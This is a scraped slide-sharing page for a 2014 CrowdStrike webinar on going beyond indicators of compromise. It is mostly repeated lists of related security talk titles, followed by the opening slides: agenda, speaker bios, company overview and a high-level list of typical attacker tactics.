Battling Unknown Malware with Machine Learning
Battling Unknown Malware with Machine Learning Battling Unknown Malware with Machine Learning
Battling Unknown Malware with Machine Learning
 
Evolving Cybersecurity Threats
Evolving Cybersecurity Threats Evolving Cybersecurity Threats
Evolving Cybersecurity Threats
 
State of Endpoint Security: The Buyers Mindset
State of Endpoint Security: The Buyers MindsetState of Endpoint Security: The Buyers Mindset
State of Endpoint Security: The Buyers Mindset
 
[CB19] Cyber Threat Landscape in Japan – Revealing Threat in the Shadow by C...
[CB19] Cyber Threat Landscape in Japan – Revealing Threat in the Shadow by C...[CB19] Cyber Threat Landscape in Japan – Revealing Threat in the Shadow by C...
[CB19] Cyber Threat Landscape in Japan – Revealing Threat in the Shadow by C...
 
Cyberextortion
CyberextortionCyberextortion
Cyberextortion
 
DevTalks 2021 Cloud Engineering @Crowdstrike
DevTalks 2021 Cloud Engineering @CrowdstrikeDevTalks 2021 Cloud Engineering @Crowdstrike
DevTalks 2021 Cloud Engineering @Crowdstrike
 
NTXISSACSC4 - Detecting and Catching the Bad Guys Using Deception
NTXISSACSC4 - Detecting and Catching the Bad Guys Using DeceptionNTXISSACSC4 - Detecting and Catching the Bad Guys Using Deception
NTXISSACSC4 - Detecting and Catching the Bad Guys Using Deception
 
MITRE ATT&CKcon 2018: Playing Devil’s Advocate to Security Initiatives with A...
MITRE ATT&CKcon 2018: Playing Devil’s Advocate to Security Initiatives with A...MITRE ATT&CKcon 2018: Playing Devil’s Advocate to Security Initiatives with A...
MITRE ATT&CKcon 2018: Playing Devil’s Advocate to Security Initiatives with A...
 
NTXISSACSC4 - Artifacts Are for Archaeologists: Why Hunting Malware Isn't Enough
NTXISSACSC4 - Artifacts Are for Archaeologists: Why Hunting Malware Isn't EnoughNTXISSACSC4 - Artifacts Are for Archaeologists: Why Hunting Malware Isn't Enough
NTXISSACSC4 - Artifacts Are for Archaeologists: Why Hunting Malware Isn't Enough
 
NTXISSACSC4 - A Brief History of Cryptographic Failures
NTXISSACSC4 - A Brief History of Cryptographic FailuresNTXISSACSC4 - A Brief History of Cryptographic Failures
NTXISSACSC4 - A Brief History of Cryptographic Failures
 
CSF18 - Guarding Against the Unknown - Rafael Narezzi
CSF18 - Guarding Against the Unknown - Rafael NarezziCSF18 - Guarding Against the Unknown - Rafael Narezzi
CSF18 - Guarding Against the Unknown - Rafael Narezzi
 

Andere mochten auch

BSides San Diego 2017 - Sophisticuffs: The rumble over adversary sophistication
BSides San Diego 2017 - Sophisticuffs: The rumble over adversary sophisticationBSides San Diego 2017 - Sophisticuffs: The rumble over adversary sophistication
BSides San Diego 2017 - Sophisticuffs: The rumble over adversary sophisticationPaül Jaramillo
 
Be Social. Use CrowdRE.
Be Social. Use CrowdRE.Be Social. Use CrowdRE.
Be Social. Use CrowdRE.CrowdStrike
 
I/O, You Own: Regaining Control of Your Disk in the Presence of Bootkits
I/O, You Own: Regaining Control of Your Disk in the Presence of BootkitsI/O, You Own: Regaining Control of Your Disk in the Presence of Bootkits
I/O, You Own: Regaining Control of Your Disk in the Presence of BootkitsCrowdStrike
 
Java Journal & Pyresso: A Python-Based Framework for Debugging Java
Java Journal & Pyresso: A Python-Based Framework for Debugging JavaJava Journal & Pyresso: A Python-Based Framework for Debugging Java
Java Journal & Pyresso: A Python-Based Framework for Debugging JavaCrowdStrike
 
End-to-End Analysis of a Domain Generating Algorithm Malware Family
End-to-End Analysis of a Domain Generating Algorithm Malware FamilyEnd-to-End Analysis of a Domain Generating Algorithm Malware Family
End-to-End Analysis of a Domain Generating Algorithm Malware FamilyCrowdStrike
 
TOR... ALL THE THINGS
TOR... ALL THE THINGSTOR... ALL THE THINGS
TOR... ALL THE THINGSCrowdStrike
 
Art Hathaway - Artificial Intelligence - Real Threat Prevention
Art Hathaway - Artificial Intelligence - Real Threat PreventionArt Hathaway - Artificial Intelligence - Real Threat Prevention
Art Hathaway - Artificial Intelligence - Real Threat Preventioncentralohioissa
 
End-to-End Analysis of a Domain Generating Algorithm Malware Family Whitepaper
End-to-End Analysis of a Domain Generating Algorithm Malware Family WhitepaperEnd-to-End Analysis of a Domain Generating Algorithm Malware Family Whitepaper
End-to-End Analysis of a Domain Generating Algorithm Malware Family WhitepaperCrowdStrike
 
BSides 2016 Presentation
BSides 2016 PresentationBSides 2016 Presentation
BSides 2016 PresentationAngelo Rago
 
The Enemy Within: Stopping Advanced Attacks Against Local Users
The Enemy Within: Stopping Advanced Attacks Against Local UsersThe Enemy Within: Stopping Advanced Attacks Against Local Users
The Enemy Within: Stopping Advanced Attacks Against Local UsersTal Be'ery
 
IDAの脆弱性とBug Bounty by 千田 雅明
IDAの脆弱性とBug Bounty by 千田 雅明IDAの脆弱性とBug Bounty by 千田 雅明
IDAの脆弱性とBug Bounty by 千田 雅明CODE BLUE
 
Tracking Exploit Kits - Virus Bulletin 2016
Tracking Exploit Kits - Virus Bulletin 2016Tracking Exploit Kits - Virus Bulletin 2016
Tracking Exploit Kits - Virus Bulletin 2016John Bambenek
 
44CON London 2015: NTFS Analysis with PowerForensics
44CON London 2015: NTFS Analysis with PowerForensics44CON London 2015: NTFS Analysis with PowerForensics
44CON London 2015: NTFS Analysis with PowerForensicsJared Atkinson
 
Hunting For Exploit Kits
Hunting For Exploit KitsHunting For Exploit Kits
Hunting For Exploit KitsJoe Desimone
 

Andere mochten auch (19)

BSides San Diego 2017 - Sophisticuffs: The rumble over adversary sophistication
BSides San Diego 2017 - Sophisticuffs: The rumble over adversary sophisticationBSides San Diego 2017 - Sophisticuffs: The rumble over adversary sophistication
BSides San Diego 2017 - Sophisticuffs: The rumble over adversary sophistication
 
Be Social. Use CrowdRE.
Be Social. Use CrowdRE.Be Social. Use CrowdRE.
Be Social. Use CrowdRE.
 
I/O, You Own: Regaining Control of Your Disk in the Presence of Bootkits
I/O, You Own: Regaining Control of Your Disk in the Presence of BootkitsI/O, You Own: Regaining Control of Your Disk in the Presence of Bootkits
I/O, You Own: Regaining Control of Your Disk in the Presence of Bootkits
 
Java Journal & Pyresso: A Python-Based Framework for Debugging Java
Java Journal & Pyresso: A Python-Based Framework for Debugging JavaJava Journal & Pyresso: A Python-Based Framework for Debugging Java
Java Journal & Pyresso: A Python-Based Framework for Debugging Java
 
Venom
Venom Venom
Venom
 
End-to-End Analysis of a Domain Generating Algorithm Malware Family
End-to-End Analysis of a Domain Generating Algorithm Malware FamilyEnd-to-End Analysis of a Domain Generating Algorithm Malware Family
End-to-End Analysis of a Domain Generating Algorithm Malware Family
 
TOR... ALL THE THINGS
TOR... ALL THE THINGSTOR... ALL THE THINGS
TOR... ALL THE THINGS
 
Art Hathaway - Artificial Intelligence - Real Threat Prevention
Art Hathaway - Artificial Intelligence - Real Threat PreventionArt Hathaway - Artificial Intelligence - Real Threat Prevention
Art Hathaway - Artificial Intelligence - Real Threat Prevention
 
End-to-End Analysis of a Domain Generating Algorithm Malware Family Whitepaper
End-to-End Analysis of a Domain Generating Algorithm Malware Family WhitepaperEnd-to-End Analysis of a Domain Generating Algorithm Malware Family Whitepaper
End-to-End Analysis of a Domain Generating Algorithm Malware Family Whitepaper
 
Practical Cyber Defense
Practical Cyber DefensePractical Cyber Defense
Practical Cyber Defense
 
A Threat Hunter Himself
A Threat Hunter HimselfA Threat Hunter Himself
A Threat Hunter Himself
 
BSides 2016 Presentation
BSides 2016 PresentationBSides 2016 Presentation
BSides 2016 Presentation
 
Hunting gh0st rat using memory forensics
Hunting gh0st rat using memory forensics Hunting gh0st rat using memory forensics
Hunting gh0st rat using memory forensics
 
The Enemy Within: Stopping Advanced Attacks Against Local Users
The Enemy Within: Stopping Advanced Attacks Against Local UsersThe Enemy Within: Stopping Advanced Attacks Against Local Users
The Enemy Within: Stopping Advanced Attacks Against Local Users
 
IDAの脆弱性とBug Bounty by 千田 雅明
IDAの脆弱性とBug Bounty by 千田 雅明IDAの脆弱性とBug Bounty by 千田 雅明
IDAの脆弱性とBug Bounty by 千田 雅明
 
Tracking Exploit Kits - Virus Bulletin 2016
Tracking Exploit Kits - Virus Bulletin 2016Tracking Exploit Kits - Virus Bulletin 2016
Tracking Exploit Kits - Virus Bulletin 2016
 
Pycon Sec
Pycon SecPycon Sec
Pycon Sec
 
44CON London 2015: NTFS Analysis with PowerForensics
44CON London 2015: NTFS Analysis with PowerForensics44CON London 2015: NTFS Analysis with PowerForensics
44CON London 2015: NTFS Analysis with PowerForensics
 
Hunting For Exploit Kits
Hunting For Exploit KitsHunting For Exploit Kits
Hunting For Exploit Kits
 

Ähnlich wie CrowdCasts Monthly: Going Beyond the Indicator

Brian Isle: The Internet of Things: Manufacturing Panacea - or - Hacker's Dream?
Brian Isle: The Internet of Things: Manufacturing Panacea - or - Hacker's Dream?Brian Isle: The Internet of Things: Manufacturing Panacea - or - Hacker's Dream?
Brian Isle: The Internet of Things: Manufacturing Panacea - or - Hacker's Dream?360mnbsu
 
Issa jason dablow
Issa jason dablowIssa jason dablow
Issa jason dablowISSA LA
 
BSidesLV 2018 - Katie Nickels and John Wunder - ATT&CKing the Status Quo
BSidesLV 2018 - Katie Nickels and John Wunder - ATT&CKing the Status QuoBSidesLV 2018 - Katie Nickels and John Wunder - ATT&CKing the Status Quo
BSidesLV 2018 - Katie Nickels and John Wunder - ATT&CKing the Status QuoKatie Nickels
 
2016, A New Era of OS and Cloud Security - Tudor Damian
2016, A New Era of OS and Cloud Security - Tudor Damian2016, A New Era of OS and Cloud Security - Tudor Damian
2016, A New Era of OS and Cloud Security - Tudor DamianITCamp
 
Year of pawnage - Ian trump
Year of pawnage - Ian trumpYear of pawnage - Ian trump
Year of pawnage - Ian trumpMAXfocus
 
10th SANS ICS Security Summit Project SHINE Presentation
10th SANS ICS Security Summit Project SHINE Presentation10th SANS ICS Security Summit Project SHINE Presentation
10th SANS ICS Security Summit Project SHINE PresentationBob Radvanovsky
 
[CLASS 2014] Palestra Técnica - Fabio Rosa
[CLASS 2014] Palestra Técnica - Fabio Rosa[CLASS 2014] Palestra Técnica - Fabio Rosa
[CLASS 2014] Palestra Técnica - Fabio RosaTI Safe
 
Fighting cyber fraud with hadoop v2
Fighting cyber fraud with hadoop v2Fighting cyber fraud with hadoop v2
Fighting cyber fraud with hadoop v2Niel Dunnage
 
2016, A new era of OS and Cloud Security
2016, A new era of OS and Cloud Security2016, A new era of OS and Cloud Security
2016, A new era of OS and Cloud SecurityTudor Damian
 
Scalar Security Roadshow - Vancouver Presentation
Scalar Security Roadshow - Vancouver PresentationScalar Security Roadshow - Vancouver Presentation
Scalar Security Roadshow - Vancouver PresentationScalar Decisions
 
Scalar Security Roadshow - Calgary Presentation
Scalar Security Roadshow - Calgary PresentationScalar Security Roadshow - Calgary Presentation
Scalar Security Roadshow - Calgary PresentationScalar Decisions
 
Cybersecurity for Energy: Moving Beyond Compliance
Cybersecurity for Energy: Moving Beyond ComplianceCybersecurity for Energy: Moving Beyond Compliance
Cybersecurity for Energy: Moving Beyond ComplianceEnergySec
 
Symantec Webinar | How to Detect Targeted Ransomware with MITRE ATT&CK
Symantec Webinar | How to Detect Targeted Ransomware with MITRE ATT&CKSymantec Webinar | How to Detect Targeted Ransomware with MITRE ATT&CK
Symantec Webinar | How to Detect Targeted Ransomware with MITRE ATT&CKSymantec
 
CONFidence2015: Real World Threat Hunting - Martin Nystrom
CONFidence2015: Real World Threat Hunting - Martin NystromCONFidence2015: Real World Threat Hunting - Martin Nystrom
CONFidence2015: Real World Threat Hunting - Martin NystromPROIDEA
 
Good Guys vs Bad Guys: Using Big Data to Counteract Advanced Threats
Good Guys vs Bad Guys: Using Big Data to Counteract Advanced ThreatsGood Guys vs Bad Guys: Using Big Data to Counteract Advanced Threats
Good Guys vs Bad Guys: Using Big Data to Counteract Advanced ThreatsZivaro Inc
 
Top Security Trends for 2014
Top Security Trends for 2014Top Security Trends for 2014
Top Security Trends for 2014Imperva
 
Emulating an Adversary with Imperfect Intelligence
Emulating an Adversary with Imperfect IntelligenceEmulating an Adversary with Imperfect Intelligence
Emulating an Adversary with Imperfect IntelligenceAdam Pennington
 
MITRE ATT&CKcon 2.0: State of the ATT&CK; Blake Strom, MITRE
MITRE ATT&CKcon 2.0: State of the ATT&CK; Blake Strom, MITREMITRE ATT&CKcon 2.0: State of the ATT&CK; Blake Strom, MITRE
MITRE ATT&CKcon 2.0: State of the ATT&CK; Blake Strom, MITREMITRE - ATT&CKcon
 
Beyond S3 Buckets - Effective Countermeasures for Emerging Cloud Threats
Beyond S3 Buckets - Effective Countermeasures for Emerging Cloud ThreatsBeyond S3 Buckets - Effective Countermeasures for Emerging Cloud Threats
Beyond S3 Buckets - Effective Countermeasures for Emerging Cloud ThreatsSBWebinars
 
Defending Threats Beyond DDoS Attacks: Featuring Guest Speaker from IDC
Defending Threats Beyond DDoS Attacks: Featuring Guest Speaker from IDCDefending Threats Beyond DDoS Attacks: Featuring Guest Speaker from IDC
Defending Threats Beyond DDoS Attacks: Featuring Guest Speaker from IDCCloudflare
 

Ähnlich wie CrowdCasts Monthly: Going Beyond the Indicator (20)

Brian Isle: The Internet of Things: Manufacturing Panacea - or - Hacker's Dream?
Brian Isle: The Internet of Things: Manufacturing Panacea - or - Hacker's Dream?Brian Isle: The Internet of Things: Manufacturing Panacea - or - Hacker's Dream?
Brian Isle: The Internet of Things: Manufacturing Panacea - or - Hacker's Dream?
 
Issa jason dablow
Issa jason dablowIssa jason dablow
Issa jason dablow
 
BSidesLV 2018 - Katie Nickels and John Wunder - ATT&CKing the Status Quo
BSidesLV 2018 - Katie Nickels and John Wunder - ATT&CKing the Status QuoBSidesLV 2018 - Katie Nickels and John Wunder - ATT&CKing the Status Quo
BSidesLV 2018 - Katie Nickels and John Wunder - ATT&CKing the Status Quo
 
2016, A New Era of OS and Cloud Security - Tudor Damian
2016, A New Era of OS and Cloud Security - Tudor Damian2016, A New Era of OS and Cloud Security - Tudor Damian
2016, A New Era of OS and Cloud Security - Tudor Damian
 
Year of pawnage - Ian trump
Year of pawnage - Ian trumpYear of pawnage - Ian trump
Year of pawnage - Ian trump
 
10th SANS ICS Security Summit Project SHINE Presentation
10th SANS ICS Security Summit Project SHINE Presentation10th SANS ICS Security Summit Project SHINE Presentation
10th SANS ICS Security Summit Project SHINE Presentation
 
[CLASS 2014] Palestra Técnica - Fabio Rosa
[CLASS 2014] Palestra Técnica - Fabio Rosa[CLASS 2014] Palestra Técnica - Fabio Rosa
[CLASS 2014] Palestra Técnica - Fabio Rosa
 
Fighting cyber fraud with hadoop v2
Fighting cyber fraud with hadoop v2Fighting cyber fraud with hadoop v2
Fighting cyber fraud with hadoop v2
 
2016, A new era of OS and Cloud Security
2016, A new era of OS and Cloud Security2016, A new era of OS and Cloud Security
2016, A new era of OS and Cloud Security
 
Scalar Security Roadshow - Vancouver Presentation
Scalar Security Roadshow - Vancouver PresentationScalar Security Roadshow - Vancouver Presentation
Scalar Security Roadshow - Vancouver Presentation
 
Scalar Security Roadshow - Calgary Presentation
Scalar Security Roadshow - Calgary PresentationScalar Security Roadshow - Calgary Presentation
Scalar Security Roadshow - Calgary Presentation
 
Cybersecurity for Energy: Moving Beyond Compliance
Cybersecurity for Energy: Moving Beyond ComplianceCybersecurity for Energy: Moving Beyond Compliance
Cybersecurity for Energy: Moving Beyond Compliance
 
Symantec Webinar | How to Detect Targeted Ransomware with MITRE ATT&CK
Symantec Webinar | How to Detect Targeted Ransomware with MITRE ATT&CKSymantec Webinar | How to Detect Targeted Ransomware with MITRE ATT&CK
Symantec Webinar | How to Detect Targeted Ransomware with MITRE ATT&CK
 
CONFidence2015: Real World Threat Hunting - Martin Nystrom
CONFidence2015: Real World Threat Hunting - Martin NystromCONFidence2015: Real World Threat Hunting - Martin Nystrom
CONFidence2015: Real World Threat Hunting - Martin Nystrom
 
Good Guys vs Bad Guys: Using Big Data to Counteract Advanced Threats
Good Guys vs Bad Guys: Using Big Data to Counteract Advanced ThreatsGood Guys vs Bad Guys: Using Big Data to Counteract Advanced Threats
Good Guys vs Bad Guys: Using Big Data to Counteract Advanced Threats
 
Top Security Trends for 2014
Top Security Trends for 2014Top Security Trends for 2014
Top Security Trends for 2014
 
Emulating an Adversary with Imperfect Intelligence
Emulating an Adversary with Imperfect IntelligenceEmulating an Adversary with Imperfect Intelligence
Emulating an Adversary with Imperfect Intelligence
 
MITRE ATT&CKcon 2.0: State of the ATT&CK; Blake Strom, MITRE
MITRE ATT&CKcon 2.0: State of the ATT&CK; Blake Strom, MITREMITRE ATT&CKcon 2.0: State of the ATT&CK; Blake Strom, MITRE
MITRE ATT&CKcon 2.0: State of the ATT&CK; Blake Strom, MITRE
 
Beyond S3 Buckets - Effective Countermeasures for Emerging Cloud Threats
Beyond S3 Buckets - Effective Countermeasures for Emerging Cloud ThreatsBeyond S3 Buckets - Effective Countermeasures for Emerging Cloud Threats
Beyond S3 Buckets - Effective Countermeasures for Emerging Cloud Threats
 
Defending Threats Beyond DDoS Attacks: Featuring Guest Speaker from IDC
Defending Threats Beyond DDoS Attacks: Featuring Guest Speaker from IDCDefending Threats Beyond DDoS Attacks: Featuring Guest Speaker from IDC
Defending Threats Beyond DDoS Attacks: Featuring Guest Speaker from IDC
 

Kürzlich hochgeladen

08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking MenDelhi Call girls
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)Gabriella Davis
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Patryk Bandurski
 
Benefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksBenefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksSoftradix Technologies
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024Scott Keck-Warren
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024Rafal Los
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsEnterprise Knowledge
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphNeo4j
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 3652toLead Limited
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slidespraypatel2
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdfhans926745
 
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...HostedbyConfluent
 
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 
How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?XfilesPro
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersEnhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersThousandEyes
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking MenDelhi Call girls
 
Key Features Of Token Development (1).pptx
Key Features Of Token Development (1).pptxKey Features Of Token Development (1).pptx
Key Features Of Token Development (1).pptxLBM Solutions
 

Kürzlich hochgeladen (20)

08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
 
Benefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksBenefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other Frameworks
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slides
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
 
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersEnhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
Key Features Of Token Development (1).pptx
Key Features Of Token Development (1).pptxKey Features Of Token Development (1).pptx
Key Features Of Token Development (1).pptx
 

CrowdCasts Monthly: Going Beyond the Indicator

  • 1. Going Beyond the Indicator
  • 2. Agenda • Introductions • Typical Attacker TTPs • Case Studies • New Tactics Explained • Hunting and Detecting • Best Practice Preparations • Resources / Q & A © 2014 CrowdStrike, Inc. All rights reserved. 2 @CROWDSTRIKE | #CROWDCASTS
  • 3. Today’s Speakers Stroz Friedberg, AT&T, The Aerospace Corporation, CERT/CC Incident Response, Forensic Analysis, and Risk Assessments DANNY LUNGSTROM © 2014 CrowdStrike, Inc. All rights reserved. 3 PRIOR TO CROWDSTRIKE 8+ YEARS @CROWDSTRIKE | #CROWDCASTS LinkedIn: Danny Lungstrom CONNECT
  • 4. Today’s Speakers KPMG LLP. (Information Protection and Business Resiliency) Performing Security Assessments, Auditing and Remediating Environments, and Developing Security Programs/Strategies JUSTIN J. WEISSERT © 2014 CrowdStrike, Inc. All rights reserved. 4 PRIOR TO CROWDSTRIKE CONNECT 7+ YEARS @CROWDSTRIKE | #CROWDCASTS LinkedIn: Justin Weissert Twitter: @JJWeissert
  • 5. Today’s Speakers RSA NetWitness, Mandiant, Beckman Coulter LinkedIn: Ryan Jafarkhani Twitter: @rj_jafar Auditing, Conducting Incident Response Investigations, Network Forensics, Computer Forensics and Malware Analysis © 2014 CrowdStrike, Inc. All rights reserved. 5 PRIOR TO CROWDSTRIKE CONNECT 5+ YEARS @CROWDSTRIKE | #CROWDCASTS RYAN JAFARKHANI
  • 6. 6 WHO IS ? CrowdStrike is a global provider of security technologies and services focused on identifying advanced threats and targeted attacks. Using big-data technologies, CrowdStrike’s next-generation threat protection platform enables enterprises to identify unknown malware, detect zero-day threats, pinpoint advanced adversaries, and provide attribution. © 2014 CrowdStrike, Inc. All rights reserved.
  • 7. 7 WHAT DO WE DO? TECHNOLOGY ENDPOINT THREAT DETECTION & RESPONSE CONTINUOUS ENDPOINT ACTIVITY MONITORING & REAL-TIME FORENSICS SERVICES PROACTIVE & INCIDENT RESPONSE SERVICES INTELLIGENCE CYBER THREAT INTELLIGENCE & ATTRIBUTION © 2014 CrowdStrike, Inc. All rights reserved.
  • 8. About CrowdStrike Services Incident Response Investigations Proactive Threat Assessments IR Program Development Average of Ten Years IR Industry Experience Backgrounds in IR Consulting, Government, and Defense Specialists in Broad Range of Technologies Finance, Technology, Manufacturing, Retail, Healthcare, Telecommunications, Oil & Gas, Entertainment © 2014 CrowdStrike, Inc. All rights reserved. 8 COMPREHENSIVE OFFERINGS INDUSTRY VETERANS VARIETY OF CUSTOMER VERTICALS @CROWDSTRIKE | #CROWDCASTS WHO ADVERSARY WHY INTENT WHAT MALWARE INDUSTRY
  • 9. And there are a lot of adversaries © 2014 CrowdStrike, Inc. All rights reserved. 9 Adversary groups our Intelligence team tracks… Commercial, Government, Non-profit Financial, Technology, Communications Defense & Aerospace, Industrial Engineering, NGOs Financial Sector Dissident groups Electronics & Communications G20, NGOs, Dissident Groups CHINA IRAN Energy Companies INDIA Government, Legal, Financial, Media, Telecom RUSSIA Oil and Gas Companies Financial Sector Crime Syndicates @CROWDSTRIKE | #CROWDCASTS
  • 10. 10 TYPICAL ATTACKER TTPS 2014 Crowdstrike, Inc. All rights reserved.
  • 11. Typical - Attacker TTPs • Initial Attack Vector • Malware – Persistence Mechanism – Command & Control – Functionality • Lateral Movement • Data Extraction/Theft 2014 CrowdStrike, Inc. All rights reserved. 11
